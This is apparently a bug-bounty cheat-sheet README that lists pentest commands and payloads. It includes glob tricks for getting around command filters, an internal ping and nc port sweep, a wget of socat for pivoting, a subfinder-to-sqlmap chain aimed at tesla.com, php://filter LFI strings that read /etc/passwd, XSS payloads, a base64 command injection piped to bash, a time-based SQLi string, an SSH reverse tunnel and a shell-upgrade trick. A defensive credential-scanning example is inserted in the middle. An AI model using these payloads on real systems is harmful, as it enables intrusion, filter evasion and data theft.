ticofookfook / Bugbounts-ferramentas-e-tutoriais


Bugbounts-ferramentas-e-tutoriais

This script downloads the tools most used in pentesting and bug bounties, creates txt files explaining how to use each one, and also downloads up-to-date wordlists for parameters, DNS, directories, etc.

Bash bypass with shell globs: use your imagination, here are some examples

/bin/b??? -p || /bi?/b??? -p = bash
/bin/ne?c?t || /bi?/ne?c?t = nc
/bin/p?t?o?3 || /bi?/p?t?o?3 = python3
/bin/p?t?o?2 || /bi?/p?t?o?2 = python2
/bin/c??l || /bi?/c??l = curl
/bin/w??t || /bi?/w??t = wget

To scan the target's network looking for active internal IPs with open ports

route|awk '{print $1}'|grep [[:digit:]] || ip route list |awk '{print $1}'|grep [[:digit:]];echo -e "\e[1;41;1;45mColoqueo ip assim -----> 172.0.0. tire o ultimo numero\e[0m" ;echo -en "Escolha o ip e coloque aqui -->: ";read num ; for i in $(seq 1 255);do ping -W 1 -c 1 $num$i | grep '64 bytes' | awk {'print $4'} | sed 's/.$//g';done > ipvalidos.txt ;for a in $(cat ipvalidos.txt);do nc -nv -w 1 -z $a 80 443 22 21 3306 25 445 139;done

Downloading socat for pivoting

Command = wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat;chmod +x socat ;./socat -h

Tutorial = https://deephacking.tech/pivoting-con-socat/
Usage = ./socat tcp-l:7878,fork,reuseaddr tcp:172.16.0.147:80 &

Collecting parameters for SQLi

collecting targets from URLs:

subfinder -d tesla.com -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a urls.txt

filtering potential SQLi:

cat urls.txt | gf sqli | tee -a sqli.txt
gf patterns = (ssrf,xss,ssti,sqli,redirect,rce,lfi,jsvar,interestingsubs,interestingparams,interestingEXT,ido,dbug)

feeding them into sqlmap:

while read line; do sqlmap -u "$line" --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3;done < sqli.txt

PHP filters

php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd
php://filter/convert.iconv.utf-8.utf-16le/resource=data://text/plain,trololohellooo=
php://filter/convert.quoted-printable-encode/resource=data://text/plain,£hellooo=
php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=
php://filter/string.strip_tags/resource=data://text/plain,Boldlalalala
php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd

Git exposed credentials with regex

/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/
/ssh:\/\/.*:.*@.*\.com/ NOT "git"
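As an added example (not part of this repository), the same credential-in-URL pattern turned into a defensive scan: it searches text such as a config file or a git history dump for URLs with an embedded password, reports each hit with the secret masked, and can redact the text before it is shared. The function names, the constructed sample lines and the treatment of NOT "git" as a substring exclusion are my assumptions.

```python
import re

# Pattern derived from the page's regexes (scheme://user:pass@host), limited to
# known schemes so a plain "https://example.com" never matches.
CRED_URL_RE = re.compile(r'\b(ssh|ftp|https?)://([^\s:/@]+):([^\s@/]+)@([^\s/:"\']+)')

# Constructed sample lines; none of these are real credentials.
SAMPLE_CONFIG = """\
# constructed sample lines, not real credentials
DB_URL=ftp://deploy:Hunter2!@files.target.com/backups
GIT_REMOTE=ssh://git:token123@git.example.com/repo.git
PUBLIC=https://target.com/index.html
SSH_JUMP=ssh://ops:s3cretpass@jump.target.com:22
"""


def find_leaked_credentials(text, domain_suffix=None, exclude="git"):
    """Return (line_no, scheme, user, host, masked_secret) for every URL that
    embeds a password. The secret is masked so findings can be logged safely.
    domain_suffix scopes hits to one organisation (the page's target\\.com);
    exclude drops matches containing that substring (the page's NOT "git")."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in CRED_URL_RE.finditer(line):
            scheme, user, secret, host = m.groups()
            if domain_suffix and not host.endswith(domain_suffix):
                continue
            if exclude and exclude in m.group(0):
                continue
            masked = secret[:2] + "*" * max(len(secret) - 2, 0)
            findings.append((line_no, scheme, user, host, masked))
    return findings


def redact_credentials(text):
    """Replace every embedded password with ***** so the text can be shared."""
    return CRED_URL_RE.sub(
        lambda m: f"{m.group(1)}://{m.group(2)}:*****@{m.group(4)}", text
    )


if __name__ == "__main__":
    for hit in find_leaked_credentials(SAMPLE_CONFIG, domain_suffix="target.com"):
        print("line %d: %s://%s:%s@%s" % (hit[0], hit[1], hit[2], hit[4], hit[3]))
```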

SSH pivoting to an internal route (reverse tunnel)

ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i ./id_rsa -R 8888:10.0.1.2:80 -N teste@103.106.0.2 &

Good XSS payloads

%22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22
data%3Atext%2Fhtml%3Bbase64%2CPGltZyBzcmM9eCBvbmVycm9yPWphdmFzY3JpcHQ6cHJvbXB0KGRvY3VtZW50LmRvbWFpbik%2B

Insert into download.php

;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0

SQLi with .php

"0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z.php

Complete GraphQL introspection query

{ __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } }

fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } }

fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue }

fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } } }

Python TTY shell

python -c 'import os;os.system("/bin/bash")'
Ctrl + Z
stty raw -echo && fg
